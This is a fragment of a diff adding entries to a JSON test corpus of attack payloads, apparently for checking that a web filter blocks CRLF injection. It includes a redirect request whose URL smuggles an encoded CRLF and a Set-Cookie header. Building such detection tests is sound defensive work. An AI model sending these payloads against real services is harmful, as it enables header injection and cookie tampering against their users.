+    "notes": "Whitespace padding before CRLF",
+    "category": "Injection"
+  },
+  {
+    "id": "CRLF-COMMENT-001",
+    "payload": "GET /api/redirect?url=http://example.com/*comment*/%0d%0aSet-Cookie:%20evil=true HTTP/1.1",
+    "tags": ["crlf", "comment", "bypass", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Comment-style chars before CRLF",
+    "category": "Injection"
+  }
+]